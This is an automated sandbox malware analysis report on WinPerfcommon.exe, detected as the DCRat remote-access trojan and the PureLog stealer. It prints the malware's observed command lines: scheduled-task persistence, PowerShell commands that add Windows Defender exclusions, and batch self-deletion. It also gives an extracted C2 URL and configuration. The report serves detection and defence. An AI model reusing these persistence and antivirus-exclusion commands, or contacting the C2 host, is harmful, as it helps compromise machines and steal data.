Windows Analysis Report
WinPerfcommon.exe

Overview

General Information

Sample name: WinPerfcommon.exe
Analysis ID: 1589192
MD5: 6b9554367a439d39a00a0dff9a08b123
SHA1: e1d22cde90c297c10f4fcba5b3980e5d551eb0b3
SHA256: 3332277b9e53375e998ccf981cdb0519fea7721b5e79a3d7a60b83f448f6c0a9
Tags: DCRat, exe, NyashTeam, user-MalHunter1

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops executable to a common third party application directory
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • WinPerfcommon.exe (PID: 6664 cmdline: "C:\Users\user\Desktop\WinPerfcommon.exe" MD5: 6B9554367A439D39A00A0DFF9A08B123)
    • csc.exe (PID: 7108 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 7144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 3368 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA39D.tmp" "c:\Windows\System32\CSCCE33B305EBF546CF9142A728297AE6DA.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • schtasks.exe (PID: 2084 cmdline: schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbN" /sc ONLOGON /tr "'C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6064 cmdline: schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbNp" /sc MINUTE /mo 9 /tr "'C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 5432 cmdline: schtasks.exe /create /tn "SystemSettingsS" /sc MINUTE /mo 11 /tr "'C:\Recovery\SystemSettings.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 6128 cmdline: schtasks.exe /create /tn "SystemSettings" /sc ONLOGON /tr "'C:\Recovery\SystemSettings.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 4928 cmdline: schtasks.exe /create /tn "SystemSettingsS" /sc MINUTE /mo 7 /tr "'C:\Recovery\SystemSettings.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 1704 cmdline: schtasks.exe /create /tn "SgrmBrokerS" /sc MINUTE /mo 12 /tr "'C:\Recovery\SgrmBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 6448 cmdline: schtasks.exe /create /tn "SgrmBroker" /sc ONLOGON /tr "'C:\Recovery\SgrmBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 7044 cmdline: schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbNp" /sc MINUTE /mo 5 /tr "'C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 7128 cmdline: schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbN" /sc ONLOGON /tr "'C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 5012 cmdline: schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbNp" /sc MINUTE /mo 10 /tr "'C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 7104 cmdline: schtasks.exe /create /tn "WinPerfcommonW" /sc MINUTE /mo 6 /tr "'C:\Users\user\Desktop\WinPerfcommon.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 6928 cmdline: schtasks.exe /create /tn "WinPerfcommon" /sc ONLOGON /tr "'C:\Users\user\Desktop\WinPerfcommon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 3620 cmdline: schtasks.exe /create /tn "WinPerfcommonW" /sc MINUTE /mo 6 /tr "'C:\Users\user\Desktop\WinPerfcommon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7056 cmdline: schtasks.exe /create /tn "SgrmBrokerS" /sc MINUTE /mo 13 /tr "'C:\Recovery\SgrmBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • powershell.exe (PID: 5752 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\StartMenuExperienceHost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2084 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6064 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SystemSettings.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7880 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 4304 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SgrmBroker.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5300 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7056 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WinPerfcommon.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7352 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\BUc8lPV5KF.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7600 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 7724 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
      • pzPgKRlGoglDaRzDTBMXwbN.exe (PID: 8004 cmdline: "C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe" MD5: 6B9554367A439D39A00A0DFF9A08B123)
        • cmd.exe (PID: 1052 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bCL7Nxg3GW.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • chcp.com (PID: 7732 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
          • PING.EXE (PID: 7244 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
  • SgrmBroker.exe (PID: 4428 cmdline: C:\Recovery\SgrmBroker.exe MD5: 6B9554367A439D39A00A0DFF9A08B123)
  • SgrmBroker.exe (PID: 7316 cmdline: C:\Recovery\SgrmBroker.exe MD5: 6B9554367A439D39A00A0DFF9A08B123)
  • StartMenuExperienceHost.exe (PID: 7524 cmdline: "C:\Program Files\Adobe\StartMenuExperienceHost.exe" MD5: 6B9554367A439D39A00A0DFF9A08B123)
  • StartMenuExperienceHost.exe (PID: 7548 cmdline: "C:\Program Files\Adobe\StartMenuExperienceHost.exe" MD5: 6B9554367A439D39A00A0DFF9A08B123)
  • SystemSettings.exe (PID: 7560 cmdline: C:\Recovery\SystemSettings.exe MD5: 6B9554367A439D39A00A0DFF9A08B123)
  • SystemSettings.exe (PID: 7592 cmdline: C:\Recovery\SystemSettings.exe MD5: 6B9554367A439D39A00A0DFF9A08B123)
  • WinPerfcommon.exe (PID: 7676 cmdline: C:\Users\user\Desktop\WinPerfcommon.exe MD5: 6B9554367A439D39A00A0DFF9A08B123)
  • WinPerfcommon.exe (PID: 7824 cmdline: C:\Users\user\Desktop\WinPerfcommon.exe MD5: 6B9554367A439D39A00A0DFF9A08B123)
  • StartMenuExperienceHost.exe (PID: 7100 cmdline: "C:\Program Files\Adobe\StartMenuExperienceHost.exe" MD5: 6B9554367A439D39A00A0DFF9A08B123)
  • cleanup
{"C2 url": "http://fsin.top/javascriptCentraldownloads", "MUTEX": "DCR_MUTEX-nQmtb0EsMA9tAW54k3K0", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Yara matches on the submitted sample:

Source | Rule | Description | Author
WinPerfcommon.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
WinPerfcommon.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

Yara matches on dropped files:

Source | Rule | Description | Author
C:\Recovery\SystemSettings.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
C:\Recovery\SystemSettings.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\Program Files\Adobe\StartMenuExperienceHost.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
C:\Program Files\Adobe\StartMenuExperienceHost.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security

Yara matches on memory dumps:

Source | Rule | Description | Author
00000000.00000002.1786930163.0000000012A0C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
00000000.00000000.1682029675.0000000000302000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
Process Memory Space: WinPerfcommon.exe PID: 6664 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
Process Memory Space: pzPgKRlGoglDaRzDTBMXwbN.exe PID: 8004 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
Process Memory Space: StartMenuExperienceHost.exe PID: 7100 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security

Yara matches on unpacked PEs:

Source | Rule | Description | Author
0.0.WinPerfcommon.exe.300000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
0.0.WinPerfcommon.exe.300000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

System Summary

Source: File created; Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ProcessId: 7108, TargetFilename: c:\Windows\System32\SecurityHealthSystray.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\StartMenuExperienceHost.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\StartMenuExperienceHost.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WinPerfcommon.exe", ParentImage: C:\Users\user\Desktop\WinPerfcommon.exe, ParentProcessId: 6664, ParentProcessName: WinPerfcommon.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\StartMenuExperienceHost.exe', ProcessId: 5752, ProcessName: powershell.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: "C:\Program Files\Adobe\StartMenuExperienceHost.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\WinPerfcommon.exe, ProcessId: 6664, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\StartMenuExperienceHost
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: explorer.exe, "C:\Program Files\Adobe\StartMenuExperienceHost.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\WinPerfcommon.exe, ProcessId: 6664, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Source: Process started; Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems); Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\WinPerfcommon.exe", ParentImage: C:\Users\user\Desktop\WinPerfcommon.exe, ParentProcessId: 6664, ParentProcessName: WinPerfcommon.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.cmdline", ProcessId: 7108, ProcessName: csc.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\StartMenuExperienceHost.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\StartMenuExperienceHost.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WinPerfcommon.exe", ParentImage: C:\Users\user\Desktop\WinPerfcommon.exe, ParentProcessId: 6664, ParentProcessName: WinPerfcommon.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\StartMenuExperienceHost.exe', ProcessId: 5752, ProcessName: powershell.exe
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Users\user\Desktop\WinPerfcommon.exe, ProcessId: 6664, TargetFilename: C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.cmdline
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\StartMenuExperienceHost.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\StartMenuExperienceHost.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WinPerfcommon.exe", ParentImage: C:\Users\user\Desktop\WinPerfcommon.exe, ParentProcessId: 6664, ParentProcessName: WinPerfcommon.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\StartMenuExperienceHost.exe', ProcessId: 5752, ProcessName: powershell.exe

Data Obfuscation

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\WinPerfcommon.exe", ParentImage: C:\Users\user\Desktop\WinPerfcommon.exe, ParentProcessId: 6664, ParentProcessName: WinPerfcommon.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.cmdline", ProcessId: 7108, ProcessName: csc.exe

Suricata IDS alerts:

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T16:20:13.961527+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 37.44.238.250 | 80 | TCP
2025-01-11T16:20:26.445916+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 37.44.238.250 | 80 | TCP
2025-01-11T16:20:52.946036+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 62175 | 37.44.238.250 | 80 | TCP
2025-01-11T16:21:01.242843+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 62196 | 37.44.238.250 | 80 | TCP
2025-01-11T16:21:05.430363+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 62218 | 37.44.238.250 | 80 | TCP
2025-01-11T16:21:11.211605+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 62254 | 37.44.238.250 | 80 | TCP
2025-01-11T16:21:14.045793+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 62270 | 37.44.238.250 | 80 | TCP
2025-01-11T16:21:17.906639+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 62295 | 37.44.238.250 | 80 | TCP
2025-01-11T16:21:38.508513+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 62410 | 37.44.238.250 | 80 | TCP
2025-01-11T16:22:05.602307+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 62447 | 37.44.238.250 | 80 | TCP
2025-01-11T16:22:14.336703+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 62448 | 37.44.238.250 | 80 | TCP
2025-01-11T16:22:17.243019+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 62449 | 37.44.238.250 | 80 | TCP
2025-01-11T16:22:23.336697+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 62450 | 37.44.238.250 | 80 | TCP
2025-01-11T16:22:25.793218+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 62451 | 37.44.238.250 | 80 | TCP
2025-01-11T16:22:28.539834+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 62452 | 37.44.238.250 | 80 | TCP
2025-01-11T16:22:31.033553+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 62453 | 37.44.238.250 | 80 | TCP


AV Detection

Source: WinPerfcommon.exe; Avira: detected
Source: http://fsin.top/javascriptCentraldownloads.php; Avira URL Cloud: Label: phishing
Source: http://fsin.top/; Avira URL Cloud: Label: phishing
Source: http://fsin.top; Avira URL Cloud: Label: phishing
Source: C:\Recovery\SgrmBroker.exe; Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe; Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\BUc8lPV5KF.bat; Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\bCL7Nxg3GW.bat; Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Recovery\SystemSettings.exe; Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe; Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: 00000000.00000002.1786930163.0000000012A0C000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: DCRat {"C2 url": "http://fsin.top/javascriptCentraldownloads", "MUTEX": "DCR_MUTEX-nQmtb0EsMA9tAW54k3K0", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe; ReversingLabs: Detection: 63%
Source: C:\Recovery\SgrmBroker.exe; ReversingLabs: Detection: 63%
Source: C:\Recovery\SystemSettings.exe; ReversingLabs: Detection: 63%
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe; ReversingLabs: Detection: 63%
Source: C:\Users\user\Desktop\GKMojBlr.log; ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\PipMsYLy.log; ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\PoUdTuAY.log; ReversingLabs: Detection: 33%
Source: C:\Users\user\Desktop\YLyBcRbf.log; ReversingLabs: Detection: 33%
Source: C:\Users\user\Desktop\fyKARhRs.log; ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\iFHJmzLo.log; ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\izcrMdWN.log; ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\yHNOGCAC.log; ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\zGtWfQBc.log; ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\zsLwvutf.log; ReversingLabs: Detection: 25%
Source: C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe; ReversingLabs: Detection: 63%
Source: WinPerfcommon.exe; ReversingLabs: Detection: 63%
Source: WinPerfcommon.exe; Virustotal: Detection: 70%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Recovery\SgrmBroker.exe; Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\GEhWIfwR.log; Joe Sandbox ML: detected
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe; Joe Sandbox ML: detected
Source: C:\Recovery\SystemSettings.exe; Joe Sandbox ML: detected
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe; Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\EAqnjiFq.log; Joe Sandbox ML: detected
Source: WinPerfcommon.exe; Joe Sandbox ML: detected
Source: 00000000.00000002.1786930163.0000000012A0C000.00000004.00000800.00020000.00000000.sdmp; String decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"},"20c484a2-7b5b-481d-bf01-55d423c9c2fd":{"_0":""},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds"}}
Source: 00000000.00000002.1786930163.0000000012A0C000.00000004.00000800.00020000.00000000.sdmp; String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-nQmtb0EsMA9tAW54k3K0","0","","","5","2","WyIxIiwiIiwiNSJd","WyIiLCJXeUlpTENJaUxDSmxlVWwzU1dwdmFXVXhUbHBWTVZKR1ZGVlNVMU5XV2tabVV6bFdZekpXZVdONU9HbE1RMGw0U1dwdmFWcHRSbk5qTWxWcFRFTkplVWxxYjJsYWJVWnpZekpWYVV4RFNYcEphbTlwWkVoS01WcFRTWE5KYWxGcFQybEtNR051Vm14SmFYZHBUbE5KTmtsdVVubGtWMVZwVEVOSk1rbHFiMmxrU0VveFdsTkpjMGxxWTJsUGFVcHRXVmQ0ZWxwVFNYTkphbWRwVDJsS01HTnVWbXhKYVhkcFQxTkpOa2x1VW5sa1YxVnBURU5KZUUxRFNUWkpibEo1WkZkVmFVeERTWGhOVTBrMlNXNVNlV1JYVldsTVEwbDRUV2xKTmtsdVVubGtWMVZwVEVOSmVFMTVTVFpKYmxKNVpGZFZhVXhEU1hoT1EwazJTVzVTZVdSWFZXbG1VVDA5SWwwPSJd"]
Source: 00000000.00000002.1786930163.0000000012A0C000.00000004.00000800.00020000.00000000.sdmp; String decryptor: [["http://fsin.top/","javascriptCentraldownloads"]]
Source: WinPerfcommon.exe; Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\WinPerfcommon.exe; Directory created: C:\Program Files\Adobe\StartMenuExperienceHost.exe
Source: C:\Users\user\Desktop\WinPerfcommon.exe; Directory created: C:\Program Files\Adobe\55b276f4edf653
